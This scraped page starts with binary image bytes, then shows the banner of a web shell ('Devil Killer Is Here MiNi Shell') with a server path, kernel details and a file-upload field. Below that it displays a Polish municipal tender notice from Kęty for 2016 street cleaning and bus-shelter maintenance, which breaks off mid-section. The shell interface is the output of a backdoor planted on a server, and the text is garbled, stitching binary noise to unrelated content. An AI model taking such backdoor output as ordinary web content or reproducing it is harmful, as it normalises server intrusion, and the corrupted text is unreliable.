JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151217/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151217/346628-N-2015.html

<p class="kh_header"><b>Kęty: Oczyszczanie Gminy wraz z utrzymaniem i opróżnianiem koszy ulicznych ze śmieci i utrzymaniem wiat i przystanków autobusowych w 2016 r.</b><br>
<b>Numer ogłoszenia: 346628 - 2015; data zamieszczenia: 17.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kęty , Rynek 7, 32-650 Kęty, woj. małopolskie, tel. 33 844-76-00, faks 33 844 76 60.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kety.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Oczyszczanie Gminy wraz z utrzymaniem i opróżnianiem koszy ulicznych ze śmieci i utrzymaniem wiat i przystanków autobusowych w 2016 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> W ramach zamówienia należy wykonać: Bieżące (całoroczne, codzienne) oczyszczanie polegające na oczyszczaniu ze śmieci, kurzu, liści, igliwia, trawy, chwastów i mchu rosnącego pomiędzy płytkami, kostką brukową, przy obrzeżach i krawężnikach z następujących miejsc: ul. Głowackiego: kładka dla pieszych wraz z dojściem przy moście na ul. Głowackiego w Kętach Aleja Cmentarna: nawierzchnia asfaltowa wraz z przyległymi zieleńcami od ul. Mickiewicza do ul. Cmentarnej w Kętach Deptak wzdłuż torów kolejowych: deptak z przyległymi trawnikami (do torowiska z jednej strony i do 1 m z drugiej strony) biegnący od ul. Kościuszki do ul. Legionów wzdłuż toru kolejowego w Kętach wraz z przylegającym terenem działki nr 2030 Droga do basenu: Chodniki wraz z opaską z kostki betonowej na odcinku od skrzyżowania z drogą przez os. Nad Sołą do hali sportowej na os. Nad Sołą w Kętach Chodnik wraz z opaską z kostki betonowej przylegający do parkingu przy OSiR (pętla przy basenie) ul. Fabryczna: parking (w rejonie ronda) wraz przyległymi chodnikami chodnik, ścieżka rowerowa, opaski z kostki betonowej na obszarze działki 8489/9 (wlot do ronda od strony zakładu produkcyjnego KENTPOL ul. Franciszkańska: chodnik oraz ścieżka rowerowa (bez utrzymania zimowego) ul. J. Kantego most na Uldze w ciągu ul. J. Kantego na granicy Kęt i Nowej Wsi (chodniki i jezdnia) ul. Kilińskiego: chodniki wokół budynku administracyjnego Urzędu Gminy przy ul. Kilińskiego 1 wraz z przyległym terenem wysypanym kruszywem ul. Klasztorna: parking - położony na części działki o nr ew. 4138/2, zlokalizowany między Klasztorem oo. Franciszkanów Reformatów i Klasztorem Zgromadzenia Sióstr Zmartwychwstania Pańskiego, działka gminna o nr ew. 4138/2 zlokalizowana przy ul. Klasztornej między Klasztorem oo. Franciszkanów Reformatów i Klasztorem Zgromadzenia Sióstr Zmartwychwstania Pańskiego wraz z przylegającym chodnikiem ul. Krakowska: działki gminne nr: 5160/2, 5160/1, 5159/7, 5163/8, 5164, 5172/1, 5150/4, 5008/1, 5007/1, 5087/3, 5087/5, 5087/6, 5086/10, 5086/11 wokół ronda na ul. Krakowskiej w Kętach ul. Legionów: chodniki po obu stronach ul. Legionów na odcinku od ul. Sobieskiego do przejazdu kolejowego oraz od przejazdu kolejowego (prawa strona) na łuku skrętu w kierunku os. Nad Sołą chodniki wraz z zieleńcami u zbiegu ul. Legionów i Kleparz w Kętach ul. 3 go Maja: chodniki przylegające do działki nr 2386/20 przy ul. 3 Maja w Kętach (na wjeździe na os. Wyszyńskiego) Chodniki przechodzą (okalają) zieleniec znajdujący się w rejonie małego ronda na wjeździe na os. Wyszyńskiego z ul. 3 Maja. Zieleniec graniczy z budynkiem nr 6 - os. Wyszyńskiego, budynkiem nr 42 - ul. 3 go Maja oraz budynkiem handlowo - usługowym - działka nr 2386/1. Przybliżona długość chodników: ok. 115 mb., ul. Św. M. Kolbe: chodnik przy ulicy Św. M. Kolbe w Kętach na odcinku leśnym - ok. 150 mb ul. Mickiewicza: parking ul. Młodzieży Polskiej: chodnik przylegający do działki nr 4351/2 przy ul. Młodzieży Polskiej (prawa strona) od nieruchomości nr 6 do skrzyżowania z ul. Świętokrzyską w Kętach chodnik i parking od strony zachodniej targowiska i obiektów sportowych chodnik od strony północnej wzdłuż orlika i skate parku do skrzyżowania z os. Kamieniec ul. Partyzantów: chodnik wzdłuż całej ul. Partyzantów do skrzyżowania z ul. Szkotnia Prawa parking przy kościele parking naprzeciw OSP Rynek: tj. płyta Rynku wraz z terenami zieleni i donicami chodniki wokół Rynku przyległe do jezdni (dolne chodniki) schody łączące dolne i górne chodniki zieleńce między dolnymi, a górnymi chodnikami górne chodniki chodniki: od strony Rynku, ul. Ludowiki, ul. Jana Kantego, przylegające do budynku Urzędu Gminy Kęty - Rynek 7 (wyłącznie utrzymanie zimowe) os. 700 - lecia: chodnik na os. 700-lecia obok sklepu Opti prowadzący w stronę ZSG nr 2 ul. Sienkiewicza: tereny dworca autobusowego (mała i duża pętla) wraz z przylegającymi chodnikami, opaskami z kostki betonowej i zieleńcami teren parkingu wraz z przyległym zieleńcem pozostałe chodniki w ciągu całej ul. Sienkiewicza (lewa i prawa strona) ul. Sobieskiego: parking u zbiegu ul. Sobieskiego i Spacerowej skwery i parking wraz z przyległym chodnikiem od strony ul. Sobieskiego przed dawną przychodnią BEFADO skwer, parking i przyległy chodnik przy Gminnym zakładzie opieki zdrowotnej na ul. Sobieskiego w Kętach (nr porządkowy budynku 35A) chodnik przylegający do działki gminnej nr 4462/1 zlokalizowanej od strony wschodniej budynku Gminnego zakładu opieki zdrowotnej przy ul. Sobieskiego, chodnik na odcinku od ul. Kleparz do ul. Legionów (po stronie pogotowia) ul. Spacerowa: chodnik wraz z ścieżką rowerową oraz opaską z kostki betonowej w ciągu ulicznym obwodnicy południowo - zachodniej Kęt - ul. Spacerowej (bez utrzymania zimowego) chodnik w ciągu ul. Spacerowej wraz z opaską z kostki betonowej pod wiaduktem kolejowym (od os. Nad Sołą do ul. Sobieskiego) chodniki na moście drogowym na rzece Soła w ciągu ulic Sobieskiego - Partyzantów w Kętach wraz z dojściami do mostu: strona wschodnia mostu od skrzyżowania ul. Sobieskiego z ul. Młodzieży Polskiej do pierwszych posesji przy ul. Partyzantów po stronie zachodniej mostu, ul. Świętokrzyska: chodnik przylegający do miejsc postojowych TAXI przy ul. Świętokrzyskiej w Kętach ul. Szkolna: chodnik przylegający do parku w dzielnicy podlesie Al. Wojska Polskiego: chodnik wraz z opaską z kostki betonowej w ciągu Al. Wojska Polskiego (bez utrzymania zimowego) ul. Wszystkich Świętych: chodniki na moście w ciągu ul. Wszystkich Świętych w Kętach chodnik przylegający do placu zabaw przy ul. Wszystkich Świętych w Kętach chodnik łączący ul. Wszystkich Świętych z ul. Ogrodową w Kętach ul. Wyspiańskiego: ścieżka obok Szkoły Podstawowej Nr 2 w Kętach łącząca ul. Wyspiańskiego z os. 700-lecia wraz z przyległymi: rowem i trawnikami; droga dochodząca do w/w ścieżki od ul. Żwirki i Wigury (dz. nr 2361/2 obok piekarni) ul. Żeromskiego: chodnik przylegający do parku w dzielnicy podlesie - odcinek od skrzyżowania z ul. Partyzantów do skrzyżowania z ul. Szkolną ul. Żwirki i Wigury: skwery wraz z przyległymi chodnikami przy ul. Żwirki i Wigury w Kętach i od strony północnej bud. nr 1A (dawna Jubilatka) oraz chodniki przylegające od strony wschodniej budynku skwer i parking wraz z przyległymi chodnikami od GOPS-u do zbiegu ulic Żwirki i Wigury z ul. Wyspiańskiego w Kętach Nowa Wieś: utrzymanie w czystości terenu będącego własnością Gminy Kęty a wykorzystywanego jako ciąg pieszy pomiędzy ul. Oświęcimską, a ul. Bolesława Prusa w Nowej Wsi o dł. ok. 110 mb (zlokalizowany na działkach o nr ew. 1257, 1253) Bielany: chodnik w Bielanach wzdłuż drogi wojewódzkiej o dł. ok. 320 mb; w miesiącach: V, VI, VII, VIII, IX wykaszanie trawy wzdłuż wskazanego chodnika do szer. ok. 1m od jego krawędzi po obu stronach wraz z usunięciem skoszonej trawy Na w/w terenach do obowiązków wykonawcy należy również bieżące (codzienne) zimowe utrzymanie obsługiwanych terenów - (oprócz miejsc dla których w niniejszej specyfikacji określono brak utrzymania zimowego), w tym: odśnieżanie i zapobieganie gołoledzi na ciągach pieszych i chodnikach (posypywanie zabezpieczonym we własnym zakresie piaskiem lub innym materiałem zaakceptowanym przez Zamawiającego) z bezwzględnym wyeliminowaniem soli. Do odśnieżania należy używać odpowiedniego sprzętu mechanicznego nie powodującego niszczenia terenów zieleni przyległych do odśnieżanych ciągów pieszych i chodników.
 Oczyszczanie wodościeków przyulicznych wraz z kratkami wodościekowymi z naniesionego osadu, ziemi, liści, igliwia oraz z rosnącej trawy i chwastów, trzykrotnie w roku, w miesiącach: IV, VII, X: Kęty: - wodościek przyuliczny w ciągu ul. Kęckie Góry Południowe (do łącznika odchodzącego do ul. Widok, ok. 564 mb), - wodościek przyuliczny w ciągu ul. Żeromskiego (ok. 656 mb), - wodościek przyuliczny w ciągu ul. Czajki (ok. 483 mb) Bulowice: - wodościek przyuliczny w ciągu ul. Nad Brzegiem (ok. 325 mb) 2a) Dwukrotnie w miesiącach: IV i X: Kęty: - rów wyłożony betonowymi płytami ażurowymi w ciągu drogi odchodzącej od ul. Partyzantów na os. Wrzosowe (obok remizy OSP) - ok. 72 mb, - wodościek przy ul. Szkolnej w Kętach (ok. 75 mb), - wodościek przyuliczny w ciągu ul. Stawowej w Kętach (ok. 320 mb) - wodościek przyuliczny w ciągu ul. Szkotnia Prawa w Kętach (ok. 365 mb) Bulowice: - wodościek przyuliczny w ciągu ul. Roczyńskiej (ok.102 mb) - wodościek przyuliczny w ciągu ul. Witkowskiej (ok. 157 mb), - wodościek przyuliczny w ciągu ul. Olszyny (ok. 76 mb), - wodościek przyuliczny w ciągu ul. Św. Brata Alberta (ok. 315 mb), - wodościek przyuliczny w ciągu ul. Zielonej (ok. 83 mb) Witkowice: - wodościek przyuliczny w ciągu ul. Granica (na odcinku leśnym, ok. 21 mb), - wodościek przyuliczny w ciągu ul. Dworskiej (ok. 200 mb) - wodościek przyuliczny w ciągu ul. Lipowej (ok. 110 mb) 2b) Jednokrotnie w miesiącu: IV Kęty: - wodościek przyuliczny w ciągu łącznika odchodzącego od ul. Kęckie Góry Południowe do ul. Widok (od posesji nr 23) - ok. 247 mb, - wodościeki przyuliczne w ciągu ul. Bulowskiej (ok. 150 mb), Bielany i Łęki: - wodościek przyuliczny w ciągu ul. Łęckiej w Bielanach i ul. Świerkowej w Łękach (ok. 1100mb) Malec - wodościek przyuliczny w ciągu ul. Widokowej (ok. 100 mb), - wodościek przyuliczny w ciągu ul. Górka (ok. 150 mb) - wodościek przyuliczny w ciągu ul. Wesołej (ok. 120 mb) - wodościek przyuliczny w ciągu ul. Kościelnej (ok. 367 mb) Nowa Wieś - wodościek przyuliczny w ciągu ul. Kościuszki (ok. 270 mb) 2c) Jednokrotnie w miesiącu: XI Kęty: - wodościek przyuliczny w ciągu ul. Kęckie Góry Południowe (do łącznika odchodzącego do ul. Widok, ok. 564 mb), Utrzymanie i opróżnianie koszy ulicznych: - bieżące opróżnianie koszy ze śmieci zlokalizowanych w miejscach publicznych na terenie Gminy (nie mniej niż 350 sztuk) uzależnione od napełnienia kosza, wraz z podrzuconymi przy koszu na śmieci workami z odpadami komunalnymi, w okresach nie dłuższych niż co 2 tygodnie. Przyjmuje się, że wypełnienie kosza w 3/4 jego objętości jest tym dniem, w którym kosz musi być opróżniony. - bieżące (codzienne) opróżnianie ze śmieci wszystkich koszy ulicznych zabudowanych na Rynku, pierzejach oraz dworcu autobusowym w Kętach, a także dbanie o ich czystość i stan techniczny, - bieżące opróżnianie koszy ulicznych zabudowanych w parkach i placach zabaw należących do Gminy Kęty. Opróżnianie koszy w parku w dzielnicy Podlesie należy wykonywać bez wjazdu pojazdami mechanicznymi na ścieżki parkowe; - sporządzenie (w terminie do 30.04.2016 r.) wykazów - inwentaryzacji opróżnianych koszy ulicznych ze śmieci z uwzględnieniem rodzaju kosza: metalowy (typ) lub plastikowy oraz sposobu mocowania (na słupku, w ogrodzeniu, znaku, płyta chodnika itp.), - poprawa mocowania kosza w podłożu i na słupku oraz utrzymanie w czystości terenu wokół kosza (szczególnie podczas opróżniania), wykonywanie drobnych napraw koszy, - wiosenne (kwiecień) malowanie koszy metalowych (kolor zielony) a dalej konserwacja - wg potrzeb, - pisemne, na bieżąco, zgłaszanie Zamawiającemu dewastacji, kradzieży, złego stanu technicznego koszy z podaniem ich rodzaju i lokalizacji, - trzykrotne w ciągu roku, w miesiącach: IV, VI, VIII mycie i dezynfekcja koszy (wewnątrz i na zewnątrz kosza) oraz wykoszenie trawy rosnącej wokół kosza. Zamawiający zastrzega sobie możliwość zgłaszania Wykonawcy informacji o nowo zamontowanych koszach ulicznych wymagających utrzymania i opróżniania. Zwiększenie liczby utrzymywanych i opróżnianych koszy nie wpływa na zmianę rzeczowego zakresu wykonywanych i nie wpływa na wzrost wynagrodzenia z tego tytułu. Sprzątanie i utrzymanie całoroczne wiat i przystanków autobusowych, wg wykazu stanowiącego załącznik nr 9 do SIWZ: - bieżące sprzątanie ze śmieci, nalepionych plakatów wiat i przystanków autobusowych, - odśnieżanie i zapobieganie gołoledzi na przystankach autobusowych, chodnikach przylegających do przystanków, zatok autobusowych - bieżące usuwanie śniegu (po intensywnych opadach śniegu), lodu i nawisów lodowych z dachów przystanków i wiat przystankowych, - bieżące usuwanie liści, gałęzi, nieczystości z dachów przystanków i wiat przystankowych oraz udrażnianie odpływu wody z ich rynien i rur spustowych, - pięciokrotne w ciągu roku, w miesiącach: V, VI, VII, VIII, IX wykaszanie terenów wokół wiat przystankowych, zatok autobusowych oraz słupków przystankowych na szer. 1,5 m, koszenie traw w urządzonych donicach na przystankach murowanych, usunięcie skoszonej trawy, usunięcie chwastów i mchu rosnącego pomiędzy płytkami lub kostką brukową na chodnikach wzdłuż całych zatok autobusowych, w zatokach autobusowych oraz wokół wiat przystankowych i słupków przystankowych. - dwukrotne w roku, w miesiącach: IV, IX mycie wiat przystankowych i zabudowanych ławeczek oraz usunięcie nalepionych plakatów, ogłoszeń itp., Bieżące sprzątanie terenu pod tablicami ogłoszeń zlokalizowanych na terenie gminy z zerwanych ogłoszeń, plakatów itp. oraz dwukrotnie w ciągu roku, w miesiącach: V i VIII oczyszczanie urzędowych tablic ogłoszeń zlokalizowanych na terenie miasta, wg załącznika nr 8 do SIWZ. - poprawa mocowania w podłożu zlokalizowanych na terenie gminy tablic ogłoszeń oraz utrzymanie w czystości terenu wokół tablic, wykonywanie drobnych napraw Przed przystąpieniem do prac w miesiącach V i VIII należy na tablicach zawiesić powiadomienie o terminie czyszczenia tablicy na 2 tygodnie przed ich wykonaniem. Usuwanie nieestetycznych kwiatów i wypalonych zniczy pozostałych po świętach okolicznościowych, a znajdujących się w miejscach zwyczajowo przyjętych na Rynku oraz innych miejscach na terenie gminy Kęty. Sprzątanie terenów publicznych w rejonach obiektów sakralnych wykorzystywanych jako miejsca handlowe podczas uroczystości odpustowych w Gminie Kęty w 2016 r. w następujących miejscach i terminach: Miasto KĘTY: Parafia św. Małgorzaty i Katarzyny - lipiec i październik Parafia N.S.P.J. - os. 700-lecia - czerwiec Parafia - Podlesie - 1- sza niedziela po Wielkanocy - 1- sza niedziela po Bożym Ciele Klasztor Ojców Reformatów - 31.07 - 2.08 SOŁECTWA: Bulowice - kwiecień - św. Wojciecha Witkowice - maj św. Urbana - wrzesień - św. Michała Nowa Wieś - sierpień - św. Maksymiliana Marii Kolbego Bielany - maj - św. Macieja - czerwiec Malec - październik - św. J. Kantego Wywóz zebranych nieczystości z terenów objętych w/w pracami (wraz z pokryciem wszelkich kosztów) do RIPOK-u (Regionalnej instalacji do przetwarzania odpadów komunalnych) zgodnie z Wojewódzkim Planem Gospodarki Komunalnej. Dostarczenie czystych odpadów zielonych do kompostowni. Prace związane z zamiataniem, czyszczeniem, zbieraniem zabrudzeń, myciem oraz odśnieżaniem należy przeprowadzać przy użyciu specjalistycznego, wielofunkcyjnego pojazdu mechanicznego wyposażonego w podzespoły i oprzyrządowanie: szczotki tarczowe z układem dysz natryskowych do zwilżania i wiązania pyłu zamiatanej, czyszczonej powierzchni chodników i parkingów przednia szczotka frezowa ręczny wąż ssawny do efektywnego zbierania zanieczyszczeń, liści etc. myjka ciśnieniowa do mycia i oczyszczania powierzchni z zabrudzeń szczotki do odmiatania śniegu pług do odgarniania i przerzucania śniegu piaskarka do posypywania parkingów i chodników w okresie zimowym Dopuszczalny całkowity ciężar urządzenia nie może przekraczać 2500 kg. Ponadto Wykonawca ma obowiązek dysponować następującymi pojazdami, narzędziami, urządzeniami: samochód specjalistyczny o masie do 3,5 do zbierania i wywozu nieczystości stałych - 1 szt. samochód o nadwoziu skrzyniowym - 1 szt. opłużony ciągnik z napędem na 4 koła - 1 szt. kosa żyłkowa spalinowa do wykaszania traw - 2 szt. dmuchawo - odkurzacz spalinowy - 1 szt. W miejscach gdzie użycie specjalistycznego pojazdu nie jest możliwe ze względów technicznych Zamawiający dopuszcza wykonywanie ręczne prac związanych z zamiataniem, czyszczeniem, zbieraniem zabrudzeń, myciem oraz odśnieżaniem. Wykonawca zobowiązany jest do zdobycia wszelkich informacji, (w tym dokonanie wizji lokalnej w terenie objętym zamówieniem), które mogą być konieczne do prawidłowej wyceny wartości usługi gdyż wyklucza się możliwość roszczeń Wykonawcy związanych z błędnym skalkulowaniem ceny lub pominięciem elementów niezbędnych do wykonania umowy. Zamawiający nie dopuszcza składania ofert częściowych. Zamawiający przewiduje możliwości udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych. Zamawiający nie dopuszcza składania ofert wariantowych. Informacje na temat podwykonawstwa: Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, której wykonanie zamierza powierzyć podwykonawcom. Zakres zamówienia przewidziany do wykonania przez podwykonawców należy wskazać w ofercie na druku stanowiącym załącznik nr 5 do niniejszej SIWZ. Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1, Wykonawca jest obowiązany wykazać Zamawiającemu, iż proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zgodnie z art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli wykonawca posiada wymagane prawem zezwolenie na transport odpadów komunalnych. Ocena spełnienia warunku zostanie dokonana na podstawie informacji zawartych w poniższym dokumencie: zezwolenie na transport odpadów wydane, w drodze decyzji, przez starostę właściwego ze względu na miejsce siedziby lub zamieszkania transportującego odpady w myśl ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2013 r., poz. 21)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek ten został spełniony jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał co najmniej dwie usługi odpowiadające wielkością i rodzajem usłudze stanowiącej przedmiot zamówienia. Za realizowane zamówienie odpowiadające swoim rodzajem usłudze stanowiącej przedmiot zamówienia rozumieć się będzie świadczenie usługi w zakresie utrzymania w czystości terenów publicznych, opróżniania koszy ulicznych, a za porównywalną wielkość - usługa o wartości brutto nie mniejszej niż 140.000,00 zł dla każdej z usług. Ocena spełnienia warunku zostanie dokonana na podstawie złożonego wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie. Zamawiający określa, aby w wykazie usług - załącznik nr 4 do SIWZ, znalazły się tylko usługi w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, określone w cz. V pkt 1 ppkt b) SIWZ. Dowody dotyczące usług wymienionych w w/w wykazie określające czy zostały wykonane należycie, to: - poświadczenie albo - oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej. Dowody, o których mowa powyżej, są wskazane w §1 ust. 2 pkt 1 i 3 Rozporządzenia Prezesa Rady Ministrów z dnia 19.02.2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. z dnia 19.02.2013 r., poz. 231). W przypadku, gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane w ww. wykazie - załącznik nr 4 do SIWZ, zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
